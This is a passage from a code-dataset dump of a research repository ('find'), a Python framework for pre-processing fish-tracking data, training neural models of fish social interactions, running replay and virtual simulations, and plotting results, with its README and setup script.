pickle.load(f)\n\n with open(self._path + test_path + '/' + test_filename.replace('{type}', 'inputs') + '.pkl', 'rb') as f:\n test_inputs = pickle.load(f)\n\n with open(self._path + test_path + '/' + test_filename.replace('{type}', 'ouputs') + '.pkl', 'rb') as f:\n test_outputs = pickle.load(f)\n\n return (train_inputs, train_outputs), (val_inputs, val_outputs), (test_inputs, test_outputs)\n\n def load(self, fname, is_absolute=False):\n if not is_absolute:\n files = glob.glob(self._path + '/raw/*' + fname)\n else:\n files = glob.glob(fname)\n pos = []\n for f in files:\n matrix = np.loadtxt(f)\n pos.append(matrix)\n self._num_individuals = pos[0].shape[1] // 2\n return pos, files\n"
},
{
"alpha_fraction": 0.6377358436584473,
"alphanum_fraction": 0.6402515769004822,
"avg_line_length": 32.125,
"blob_id": "f695ff0ad7aab598eb2d173cefd5770994993b79",
"content_id": "7b4e51282555cde24f4e10f4ec1f389619978c03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 795,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 24,
"path": "/find/simulation/replay_individual.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.simulation.individual import Individual\n\n\nclass ReplayIndividual(Individual):\n def __init__(self, positions, velocities):\n # explicitly setting that this is not a robotic/virtual individual\n super().__init__(is_robot=False)\n self._position_history = positions\n print(positions.shape)\n self._velocity_history = velocities\n self._position = self._position_history[0, :]\n self._velocity = self._velocity_history[0, :]\n\n def interact(self, simu):\n pass\n\n def move(self, simu):\n self._position = self._position_history[simu.get_current_iteration(\n ), :]\n self._velocity = self._velocity_history[simu.get_current_iteration(\n ), :]\n\n def _history_update(self, simu):\n pass\n"
},
{
"alpha_fraction": 0.6390977501869202,
"alphanum_fraction": 0.646616518497467,
"avg_line_length": 12.300000190734863,
"blob_id": "62ca2e228061d0ff558d6f5312a61636ee92cd75",
"content_id": "3f91b8e75ea76f84bb60e04ea6c3b736d53c1013",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 10,
"path": "/find/models/tf_activations.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import tensorflow.keras.backend as K\n\n\ndef gaussian(x):\n return K.exp(-K.pow(x, 2))\n\n\nactivations = {\n 'gaussian': gaussian,\n}\n"
},
{
"alpha_fraction": 0.7369888424873352,
"alphanum_fraction": 0.7485129833221436,
"avg_line_length": 41.69841384887695,
"blob_id": "2051b37bb98222a8ba1ee6bf57eca5d3de5a5316",
"content_id": "1f2bf8c416d4fe02cbf2ca9dc07f1cb8fc6f0ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5381,
"license_type": "no_license",
"max_line_length": 380,
"num_lines": 126,
"path": "/Readme.md",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "[](https://zenodo.org/badge/latestdoi/337859711)\n\n# Fish INteraction moDeling framework (~> find)\n\nThis repo contains contains an attempt to unify multiple methodologies and packages to allow for easily pre-processing and modeling social interactions and behavioural responses of fish. While this could as well be adapted to any kind of social or behavioural interactions that can be observed from spatial data, this has been thorougly developed and tested for fish interactions.\n\nTo this point the framework contains the following discrete packages that help in the study and understanding of interactions:\n\n1. Pre-processing code to filter out tracking system inaccuracies, smooth data, segment experimental files when tracking confidence is low and storage.\n2. Modeling code that allows the user to choose a model if her/his choice (or build one) and quickly train it.\n3. Simulation code that allows the user to thoroughly test the generated model against the real data either in a 'Real VS Model' comparison or 'Model VS Model' ability to produce the global dynamics and demonstrate the emergence of more complex patterns observed in the real data.\n4. Plots to easily compare the results of steps 1, 2 and 3. \n5. **[Under development]** Behavioural tools that not only capture social interactions but behaviour as a whole along with intelligent integration in simulation. \n\n\n## Installation\n\n- Open your favourite terminal and clone this repository:\n\n ```shell\n git clone https://github.com/bpapaspyros/find.git && cd find\n ```\n\n To use some of our data-sets you can clone one of the following:\n\n ```shell\n git clone [email protected]:epfl-mobots/plos_one_experiments.git data/ring\n ```\n\n ```shell\n git clone [email protected]:epfl-mobots/preddl_2023.git data/open_50cm\n ```\n\n- **[Optional but suggested]** Create a virtual python environment:\n \n ```shell\n virtualenv -p /usr/bin/python3 venv\n ```\n\n Notice that *find* has been tested with **Python 3.9.7**. \n\n\n\n Once you have created the environment go ahead and enable it:\n\n ```shell\n source venv/bin/activate\n ```\n- Go ahead and install dependencies as follows: \n\n\n\n For the core functionality only **[TF2 should detect a GPU if available and CUDA is installed]** : \n \n ```shell\n pip install -e .\n ```\n\n Additional packages to install dependencies related to linting and plotting: \n \n ```shell\n pip install -e '.[test, plot]'\n ```\n\n\n## Pre-processing your data\n\nYou can use the available fish data to test this part or take a deeper look in the code and adapt your data and/or the code to go through this section. Before you process anything, take a look at the available options that the pre-processing script offers, as follows:\n\n```shell\npython -m find.utils.preprocess -h\n```\n\nFor example, you can go ahead and pre-process the Hemigrammus rhodostomus data provided by our partners at the Université Toulouse III - Paul Sabatier in France:\n\n```shell\npython -m find.utils.preprocess -p data/open_50cm/rummy/pair/ -f 'raw_positions*2G*.dat' --fps 25 -c 3 --toulouse --radius 0.25\n```\n\nThis should create a new folder at the current directory with the format `$hostname_$hour_$minute_$second`. Inside this folder you will find processed versions of your original data files along with a correspondence file letting you know which processed file corresponds to which raw file.\n\n\n## Train a model to reproduce the interaction dynamics observed in the processed data\n\nBefore you start training models, you can take a look at the available models and training options by invoking the help function:\n\n```shell\npython -m find.models.trainer -h\n```\n\nFor example, you can use a simple probabilistic LSTM structure as follows:\n\n```shell\npython -m find.models.trainer -p experiment_folder -t 0.12 -e 81 -d 1 -b 512 --model PLSTM\n```\n\nNotice that despite the `81` epoch limit, there are additional stopping criteria that you can edit by taking a look in the `trainer.py`.\n\n\n## Simulations\n\nOnce you have a version of the model you can run simulations and already start plotting some results. The simulation module contains multiple option that you can see by invoking the following command:\n\n```shell\npython -m find.simulation.simulation -h\n```\n\nFor example, assuming you provided data with multiple individuals, let's say 2, then you can run a hybrid simulation (i.e., one replayed trajectory plus the model interacting) as follows:\n\n```shell\npython -m find.simulation.simulation -p <path to the experiment> -r <path to a reference file> -t <timestep> --exclude_index <id of the individual to be replaced by the model>\n```\n\nor run a complety virtual (i.e., model VS model):\n\n```shell\npython -m find.simulation.simulation -p <path to the experiment> -r <path to a reference file> -t <timestep> --exclude_index -1 -i <number of timesteps to simulate>\n```\n\nFinally there is an option that allows you to create simulations with more individuals than the original dataset to study the scalability of the system. For example, you can do the following:\n\n```shell\npython -m find.simulation.simulation -p <path to the experiment> -r <path to a reference file> -t <timestep> --exclude_index -1 -i <number of timesteps to simulate> --num_extra_virtu 4\n```\n\nthat would correspond to a simulation of 4 + the original number of individuals.\n"
},
{
"alpha_fraction": 0.5210084319114685,
"alphanum_fraction": 0.5334861278533936,
"avg_line_length": 36.04716873168945,
"blob_id": "ce8cda2b6cebfae1c9de3b3ee28ec98be47bef49",
"content_id": "566a5934b96fc5dd9f3d1f85bb6d65492a488dc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3927,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 106,
"path": "/find/simulation/trajnet_functors.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom find.simulation.tf_nn_functors import CircularCorridor, _sample_valid_position, most_influential_individual, get_most_influential_individual\n\nimport torch\nfrom copy import deepcopy\n\n\nclass Trajnet_dir:\n def __init__(self, model, num_timesteps, args, num_neighs=1):\n self._lstm_pred = model\n self._model = self._lstm_pred.model\n self._num_timesteps = num_timesteps\n self._num_neighs = num_neighs\n self._selection = most_influential_individual[args.most_influential_individual](args\n )\n self._args = args\n # ! this is also very specific to the inputs we use and should be generalized\n self._cc = CircularCorridor(1.0, (0, 0))\n self._radius = 0.25\n self._offset = 1.0\n self._full_pred = [None, None]\n self._means = [None, None]\n self._stds = [None, None]\n\n def get_full_pred(self):\n return self._full_pred\n\n def get_means(self):\n return self._means\n\n def get_stds(self):\n return self._stds\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = np.empty((0, 2))\n xy_f = focal.get_position_history()[-self._num_timesteps:, :]\n xy_f = xy_f + self._offset\n ind_idcs = self._selection(focal_id, individuals)\n\n for i in range(self._num_timesteps):\n X = np.vstack((X, xy_f[i, :]))\n for idx in ind_idcs[:self._num_neighs]:\n ind = individuals[idx]\n xy_n = ind.get_position_history(\n )[-(self._num_timesteps - i), :]\n xy_n = xy_n + self._offset\n X = np.vstack((X, xy_n))\n X = X.reshape(self._num_timesteps, self._num_neighs + 1, 2)\n\n xy = torch.Tensor(X)\n scene_goal = np.zeros(shape=(2, 2))\n scene_goal = torch.Tensor(scene_goal)\n batch_split = [0, X.shape[1]]\n batch_split = torch.Tensor(batch_split).long()\n\n modes = 1\n n_predict = 3\n multimodal_outputs = {}\n\n max_retries = 100\n retries = 0\n\n while True:\n normals, output_scenes = self._model(\n xy, scene_goal, batch_split, n_predict=n_predict)\n output_scenes = output_scenes.detach().numpy()\n normals = normals.detach().numpy()\n output_primary = output_scenes[-n_predict:, 0]\n output_neighs = output_scenes[-n_predict:, 1:]\n multimodal_outputs[0] = [output_primary, output_neighs]\n\n # decoder results\n num_tsteps = output_scenes.shape[0] // 2\n means = np.empty((0, 2))\n stds = np.empty((0, 2))\n sampled_pos = np.empty((num_tsteps, 2))\n\n for i in range(num_tsteps):\n means = np.vstack([means, output_scenes[-num_tsteps+i, 0, :]])\n stds = np.vstack([stds, normals[-num_tsteps+i, 0, 2:-1]])\n sampled_pos[i, 0] = np.random.normal(means[i, 0], stds[i, 0])\n sampled_pos[i, 1] = np.random.normal(means[i, 1], stds[i, 1])\n\n full_pred = deepcopy(multimodal_outputs[0])\n self._full_pred[focal_id] = full_pred[0] - self._offset\n self._means[focal_id] = means - self._offset\n self._stds[focal_id] = stds\n\n prediction = deepcopy(sampled_pos[0])\n prediction = prediction - self._offset\n\n # keep sampling until there is a valid prediction\n if self._cc.is_valid(self._cc.radius(prediction)):\n break\n else:\n if retries > max_retries:\n prediction = focal.get_position()\n break\n else:\n retries += 1\n\n return prediction\n"
},
{
"alpha_fraction": 0.6214575171470642,
"alphanum_fraction": 0.6288799047470093,
"avg_line_length": 31.933332443237305,
"blob_id": "6d86ab8cd9a5a1785c796ee04497d44b0af4bca3",
"content_id": "8d2d8a517e15a487601920f18c28d1cc4b7c86c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1482,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 45,
"path": "/examples/simu_example.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nimport argparse\nimport numpy as np\nfrom utils.features import Velocities\n\nsys.path.append('.')\n\nfrom simulation.fish_simulation import FishSimulation\nfrom simulation.replay_individual import ReplayIndividual\nfrom simulation.position_stat import PositionStat\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--path', '-p', type=str,\n help='Path to a trajectory file',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n default=0.12, \n required=False)\n args = parser.parse_args()\n\n # loading pre-recorded trajectories\n trajectories = np.loadtxt(args.path)\n num_timesteps = trajectories.shape[0]\n print('Simulation will run for', num_timesteps, 'timesteps')\n\n # initializing the simulation\n simu_args = {\n 'stats_enabled': True,\n }\n simu = FishSimulation(args.timestep, num_timesteps, args=simu_args)\n \n # adding individuals to the simulation\n for i in range(trajectories.shape[1] // 2):\n p = trajectories[:, (i * 2) : (i * 2 + 2)]\n v = Velocities([p], args.timestep).get()[0]\n simu.add_individual(ReplayIndividual(p, v))\n\n # adding stat objects\n simu.add_stat(PositionStat(trajectories.shape[1], 'positions.dat', simu.get_dirname()))\n\n # run simulation\n simu.spin()\n"
},
{
"alpha_fraction": 0.6136114001274109,
"alphanum_fraction": 0.6169044971466064,
"avg_line_length": 23.62162208557129,
"blob_id": "17a377931d9513dcf47921fd952f448cb4ef2ef8",
"content_id": "9b2bfb554b5f1923a78649a45bb3631e1ac61f67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 37,
"path": "/find/models/model_factory.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import find.models.tf_models as tfm\n\nmodel_choices = {\n 'PLSTM': tfm.PLSTM,\n 'PLSTM_SHALLOW': tfm.PLSTM_SHALLOW,\n 'PLSTM_2L': tfm.PLSTM_2L,\n 'PLSTM_MULT_PREDS': tfm.PLSTM_MULT_PREDS,\n 'PFW': tfm.PFW,\n 'LCONV': tfm.LCONV,\n 'LSTM': tfm.LSTM,\n 'PLSTM_builder': tfm.PLSTM_model_builder,\n 'PFW_builder': tfm.PFW_model_builder,\n}\n\nbackend = {\n 'PLSTM': 'keras',\n 'PLSTM_SHALLOW': 'keras',\n 'PLSTM_2L': 'keras',\n 'PLSTM_MULT_PREDS': 'keras',\n 'PFW': 'keras',\n 'LCONV': 'keras',\n 'LSTM': 'keras',\n 'PLSTM_builder': 'keras',\n 'PFW_builder': 'keras',\n}\n\n\ndef available_models():\n return list(model_choices.keys())\n\n\nclass ModelFactory:\n def __call__(self, model_choice, input_shape, output_shape, args):\n return model_choices[model_choice](input_shape, output_shape, args)\n\n def model_backend(self, model_choice):\n return backend[model_choice]\n"
},
{
"alpha_fraction": 0.4940639138221741,
"alphanum_fraction": 0.5059360861778259,
"avg_line_length": 21.8125,
"blob_id": "e1d015a75923a43e37b0f7bbf32a9b8cdb88b465",
"content_id": "c9d73c726b09447f258842441905c78c4b15db5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1095,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 48,
"path": "/setup.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\n# extract version from __init__.py\nwith open('find/__init__.py', 'r') as f:\n VERSION_LINE = [l for l in f if l.startswith('__version__')][0]\n VERSION = VERSION_LINE.split('=')[1].strip()[1:-1]\n\n\nsetup(\n name='find',\n version=VERSION,\n packages=find_packages(),\n description='Fish INteraction moDeling framework.',\n # long_description=open('Readme.md').read(),\n author='Vaios Papaspyros',\n author_email='[email protected]',\n url='https://github.com/bpapaspyros/find',\n\n install_requires=[\n 'numpy',\n 'h5py',\n 'python-dateutil',\n 'keras==2.6.0',\n 'tensorflow==2.6.0',\n 'torch',\n 'tqdm',\n 'word2number',\n 'torch', # install pytorch and allow for extending find\n 'tqdm',\n ],\n extras_require={\n 'test': [\n 'pylint',\n 'autopep8',\n ],\n 'plot': [\n 'pandas',\n 'seaborn',\n 'scipy',\n 'matplotlib',\n 'pillow'\n ]\n },\n\n classifiers=[\n ]\n)\n"
},
{
"alpha_fraction": 0.5371270179748535,
"alphanum_fraction": 0.562109649181366,
"avg_line_length": 26.188678741455078,
"blob_id": "567f07db0d31bee144e53eed48eb1a1da386b979",
"content_id": "5b81b506cd2873bf7db3b76002ef3b91f45d3208",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2882,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 106,
"path": "/find/plots/common.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport seaborn as sns\n\nfrom matplotlib import gridspec\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nfrom matplotlib.colors import ListedColormap\n\nfrom itertools import cycle\nfrom pylab import mpl, rcParams, Rectangle, Circle\n\n_uni_pallete = sns.color_palette(\"bright\", n_colors=20, desat=.5)\n\n\ndef uni_palette():\n return _uni_pallete\n\n\ndef uni_colours():\n return sns.color_palette(uni_palette())\n\n\ndef uni_cycler():\n return cycle(uni_palette())\n\n\nuni_linewidth = 1.1\nfontsize = 11\n\nparams = {\n 'figure.dpi': 300,\n 'savefig.dpi': 300,\n 'lines.linewidth': uni_linewidth,\n 'font.size': fontsize,\n}\nrcParams.update(params)\n\nsns.set_style(\n \"whitegrid\",\n # \"darkgrid\",\n {\n 'axes.axisbelow': False,\n 'axes.edgecolor': '.8',\n 'axes.facecolor': 'white',\n 'axes.grid': True,\n 'axes.labelcolor': '.15',\n 'axes.linewidth': 1.0,\n 'font.family': [u'sans-serif'],\n 'font.sans-serif': [u'Arial',\n u'Liberation Sans',\n u'Bitstream Vera Sans',\n u'sans-serif'],\n 'grid.color': '.8',\n 'grid.linestyle': u'-',\n 'image.cmap': u'Greys',\n 'legend.frameon': False,\n 'legend.numpoints': 1,\n 'legend.scatterpoints': 1,\n 'lines.solid_capstyle': u'round',\n 'text.color': '.15',\n 'xtick.color': '.15',\n 'xtick.direction': u'in',\n 'xtick.major.size': 0.0,\n 'xtick.minor.size': 0.0,\n 'ytick.color': '.15',\n 'ytick.direction': u'in',\n 'ytick.major.size': 0.0,\n 'ytick.minor.size': 0.0,\n 'grid.linestyle': 'dotted',\n 'text.usetex': True,\n 'lines.linewidth': uni_linewidth,\n 'font.size': fontsize,\n })\n\n\nuni_lines = [\"-\"]\n\n\ndef uni_linecycler():\n return cycle(uni_lines)\n\n\nuni_pts = np.linspace(0, np.pi * 2, 24)\nuni_circ = np.c_[np.sin(uni_pts) / 2, -np.cos(uni_pts) / 2]\nuni_vert = np.r_[uni_circ, uni_circ[::-1] * 1.0]\nuni_open_circle = mpl.path.Path(uni_vert)\nuni_extra = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\n\nuni_v = np.r_[uni_circ, uni_circ[::-1] * 0.6]\nuni_oc = mpl.path.Path(uni_v)\n\nhandles_a = [\n mlines.Line2D([0], [0], color='black', marker=uni_oc,\n markersize=6, label='Mean and SD'),\n mlines.Line2D([], [], linestyle='none', color='black', marker='*',\n markersize=5, label='Median'),\n mlines.Line2D([], [], linestyle='none', markeredgewidth=1, marker='o',\n color='black', markeredgecolor='w', markerfacecolor='black', alpha=0.5,\n markersize=5, label='Single run')\n]\n\nhandles_b = [\n mlines.Line2D([0], [1], color='black', label='Mean'),\n Circle((0, 0), radius=1, facecolor='black', alpha=0.35, label='SD')\n]\n"
},
{
"alpha_fraction": 0.6287128925323486,
"alphanum_fraction": 0.6303630471229553,
"avg_line_length": 29.299999237060547,
"blob_id": "15644ca618bf4e4d1315292c5270055911901405",
"content_id": "4852932a0f51303bdbd22d4ed917a61e18744638",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 606,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/find/simulation/simu/stat/stat_base.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "class StatBase:\n def __init__(self, filename, dirname='', dump_period=-1):\n self._dirname = dirname\n self._filename = filename\n self._dump_period = dump_period\n\n def set_dirname(self, dirname):\n self._dirname = dirname\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n assert False, 'You need to implement this function in a subclass'\n\n def save(self):\n assert False, 'You need to implement this function in a subclass'\n\n def __call__(self, simu):\n assert False, 'You need to implement this function in a subclass'\n"
},
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 10.461538314819336,
"blob_id": "77a638651067465bd9ef06a7524b5773eaec915c",
"content_id": "78fc5709d6e8684e001fab63596e1787abd23f23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 13,
"path": "/find/plots/physiological/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "\nplot_dict = {\n}\n\n\nsource = 'physiological'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.5596441626548767,
"alphanum_fraction": 0.5671249628067017,
"avg_line_length": 41.27350616455078,
"blob_id": "6ac02e61dfc08d0155693a49bc9b28a4095c72b5",
"content_id": "29647532275075da5b2d608edd5f498c698b3f07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4946,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 117,
"path": "/find/simulation/simulation_factory.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import os\n\nimport find.simulation.trajnet_functors as tnf\n\nimport find.simulation.tf_nn_functors as tfnnf\nfrom find.simulation.tf_nn_functors import get_most_influential_individual\nfrom find.simulation.fish_simulation import FishSimulation\nfrom find.simulation.replay_individual import ReplayIndividual\nfrom find.simulation.nn_individual import NNIndividual\nfrom find.simulation.tf_nn_functors import Multi_plstm_predict, Multi_plstm_predict_traj\nfrom find.simulation.position_stat import PositionStat\nfrom find.simulation.velocity_stat import VelocityStat\nfrom find.simulation.nn_prediction_stat import NNPredictionStat\n\nfrom find.utils.features import Velocities\n\nnn_functor_choices = {\n 'PLSTM': tfnnf.Multi_plstm_predict,\n 'PLSTM_SHALLOW': tfnnf.Multi_plstm_predict,\n 'PLSTM_2L': tfnnf.Multi_plstm_predict,\n 'PLSTM_MULT_PREDS': tfnnf.Multi_plstm_predict_traj,\n 'PFW': tfnnf.Multi_pfw_predict,\n 'LCONV': tfnnf.Multi_plstm_predict,\n\n 'trajnet_dir': tnf.Trajnet_dir,\n}\n\n\ndef available_functors():\n return list(nn_functor_choices.keys())\n\n\nclass SimulationFactory:\n def __call__(self, data, model, nn_functor, backend, args):\n if not os.path.exists(args.simu_out_dir):\n os.makedirs(args.simu_out_dir)\n\n if backend == 'keras':\n return self._construct_sim(data, model, nn_functor_choices[nn_functor], backend, args)\n elif backend == 'trajnet':\n return self._construct_sim(data, model, nn_functor_choices[nn_functor], backend, args)\n\n def _construct_sim(self, data, model, nn_functor, backend, args):\n pos = data\n vel = Velocities([pos], args.timestep).get()[0]\n\n # initializing the simulation\n # if the trajectory is replayed then -1 makes sure that the last model prediction is not added to the generated file to ensure equal size of moves\n iters = pos.shape[0] - \\\n args.num_timesteps if args.iterations < 0 else args.iterations\n\n simu_args = {'stats_enabled': True, 'simu_dir_gen': False}\n simu = FishSimulation(args.timestep, iters, args=simu_args)\n\n interaction_functor = None\n if 'LSTM' in args.nn_functor or 'trajnet' in args.nn_functor:\n interaction_functor = nn_functor(\n model, args.num_timesteps, args=args, num_neighs=args.num_neighs_consider)\n else:\n interaction_functor = nn_functor(\n model, args=args, num_neighs=args.num_neighs_consider)\n\n if iters <= 0:\n return None\n\n # adding individuals to the simulation\n for i in range(pos.shape[1] // 2):\n if args.exclude_index > -1:\n if args.exclude_index == i:\n simu.add_individual(\n NNIndividual(\n interaction_functor,\n initial_pos=pos[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)],\n initial_vel=vel[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)]\n ))\n else:\n simu.add_individual(ReplayIndividual(\n pos[:, (i * 2): (i * 2 + 2)],\n vel[:, (i * 2): (i * 2 + 2)]))\n else: # purely virtual simulation\n simu.add_individual(\n NNIndividual(\n interaction_functor,\n initial_pos=pos[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)],\n initial_vel=vel[:(args.num_timesteps),\n (i * 2): (i * 2 + 2)]\n ))\n\n if args.exclude_index < 0:\n for _ in range(args.num_extra_virtu):\n simu.add_individual(\n NNIndividual(\n interaction_functor,\n initial_pos=pos[:(args.num_timesteps), 0:2],\n initial_vel=vel[:(args.num_timesteps), 0:2]\n ))\n\n # generated files have different names if the simulation is virtual or hybrid\n basename = os.path.basename(args.reference)\n if args.exclude_index < 0:\n gp_fname = args.simu_out_dir + '/' + \\\n basename.replace('processed', 'generated_virtu')\n else:\n gp_fname = args.simu_out_dir + '/' + basename.replace(\n 'processed', 'idx_' + str(args.exclude_index) + '_generated')\n gv_fname = gp_fname.replace('positions', 'velocities')\n\n # adding stat objects\n simu.add_stat(PositionStat(\n pos.shape[1] + args.num_extra_virtu * 2, gp_fname, dump_period=args.simu_stat_dump_period))\n simu.add_stat(VelocityStat(\n vel.shape[1] + args.num_extra_virtu * 2, gv_fname, dump_period=args.simu_stat_dump_period))\n\n return simu\n"
},
{
"alpha_fraction": 0.7194805145263672,
"alphanum_fraction": 0.7220779061317444,
"avg_line_length": 41.77777862548828,
"blob_id": "7cd5eeaef7e90373b226b326697a1ce77c7a5e83",
"content_id": "0c56c5b480c87fdd8dd6ce72460c2cfce587f967",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 385,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 9,
"path": "/find/simulation/fish_simulation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.simulation.simulation import Simulation\nfrom find.simulation.simu.simulation.individual import Individual\n\n\nclass FishSimulation(Simulation):\n def __init__(self, timestep, num_iterations, args={'stats_enabled': False}):\n Individual.reset_ind_id()\n # TODO: super() is python 3 specific\n super().__init__(timestep, num_iterations, args)\n"
},
{
"alpha_fraction": 0.739382266998291,
"alphanum_fraction": 0.739382266998291,
"avg_line_length": 23.66666603088379,
"blob_id": "c1308f0345c054897c6034771f8d5d688e7c17f4",
"content_id": "f6d62872f64ca9c5c207eb8f5429f6b8f1f774c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 21,
"path": "/find/plots/nn/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.nn import training_history\nfrom find.plots.nn import parameters_to_epoch\nfrom find.plots.nn import trajectory_prediction\nfrom find.plots.nn import training_curves\n\nplot_dict = {\n 'training_history': training_history.plot,\n 'parameters_to_epoch': parameters_to_epoch.plot,\n 'trajectory_prediction': trajectory_prediction.plot,\n 'training_curves': training_curves.plot\n}\n\nsource = 'nn'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.5061728358268738,
"alphanum_fraction": 0.5404938459396362,
"avg_line_length": 34.21739196777344,
"blob_id": "fa4fb76c946b318f0d2cb3f925eeb6b7ce16ac0e",
"content_id": "c1cd15e94511642aa6362753ac94f8ae8cc5d1dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 115,
"path": "/find/plots/dl_si_2021/occupancy_grids.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.spatial.grid_occupancy as go\n\n\ndef plot(exp_files, path, args):\n data = {}\n grids = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e] = []\n for p in pos:\n if e == 'Virtual (Toulouse)':\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n data[e].append(positions)\n\n x, y, z = go.construct_grid(data, e, args)\n grid = {'x': x, 'y': y, 'z': z}\n grids[e] = grid\n\n fig = plt.figure()\n fig.set_figwidth(9)\n fig.set_figheight(7)\n gs = fig.add_gridspec(2, 1)\n gs.set_height_ratios([2.75, 1])\n\n gs_cbar = gs[1].subgridspec(1, 1)\n\n gs0 = gs[0].subgridspec(1, 2)\n gs00 = gs0[0].subgridspec(1, 1)\n gs01 = gs0[1].subgridspec(2, 2, hspace=0.15)\n\n ax0 = fig.add_subplot(gs00[0])\n ax1 = fig.add_subplot(gs01[0, 0])\n ax2 = fig.add_subplot(gs01[0, 1])\n ax3 = fig.add_subplot(gs01[1, 0])\n ax4 = fig.add_subplot(gs01[1, 1])\n ax_cbar = fig.add_subplot(gs_cbar[0])\n\n orig_cutoff = args.grid_cutoff_val\n # This was set to match the max among all grids for H. Rhodostomus\n args.grid_cutoff_val = 0.002\n\n ax0, cmesh = go.occupancy_grid(data, grids['Real'],\n fig, 'Control (CD)', ax0,\n args, pad=0.25, draw_colorbar=False)\n ax1, _ = go.occupancy_grid(data, grids['Virtual'],\n fig, 'HR-NNig', ax1, args, draw_colorbar=False)\n ax2, _ = go.grid_difference(grids,\n 'Real', 'Virtual',\n fig, ax2, args, draw_colorbar=False)\n\n ax3, _ = go.occupancy_grid(data, grids['Virtual (Toulouse)'],\n fig, 'ABC', ax3, args, draw_colorbar=False)\n ax4, _ = go.grid_difference(grids,\n 'Real', 'Virtual (Toulouse)',\n fig, ax4, args, draw_colorbar=False)\n\n cbar = fig.colorbar(cmesh, ax=ax_cbar, label='Cell occupancy (%)',\n location='top', extend='max', pad=0.3)\n cbar.ax.tick_params(rotation=30)\n\n ax0.text(-0.2, 1.07, r'$\\mathbf{A}$',\n fontsize=25, transform=ax0.transAxes)\n ax1.text(-0.2, 1.07, r'$\\mathbf{B}$',\n fontsize=25, transform=ax1.transAxes)\n 